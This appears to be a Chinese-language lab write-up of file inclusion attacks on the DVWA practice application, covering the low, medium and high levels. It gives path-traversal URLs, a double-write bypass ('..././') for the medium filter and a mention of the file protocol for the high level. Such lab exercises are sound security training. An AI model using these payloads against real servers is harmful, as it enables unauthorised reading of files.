文件包含攻击实验

实验环境:

实验角色

操作系统

IP 地址

备注

攻击机

Kali Linux

192.168.221.128

靶机

Windows Server 2003

192.168.221.130

实验需求:

  1. 分别完成 DVWA 中文件包含攻击的三个级别的攻击任务

实验步骤:

1. low 级别

get 型

文件包含攻击实验_第1张图片

修改 URL

http://192.168.221.130/dvwa/vulnerabilities/fi/?page=file4.php

文件包含攻击实验_第2张图片

http://192.168.221.130/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

文件包含攻击实验_第3张图片

  • medium 级别

查看源代码

文件包含攻击实验_第4张图片

双写绕过

http://192.168.221.130/dvwa/vulnerabilities/fi/?page=..././..././phpinfo.php

文件包含攻击实验_第5张图片

  • high 级别

查看源代码

文件包含攻击实验_第6张图片

用 file 协议

文件包含攻击实验_第7张图片

你可能感兴趣的:(渗透测试学习,php,网络,安全)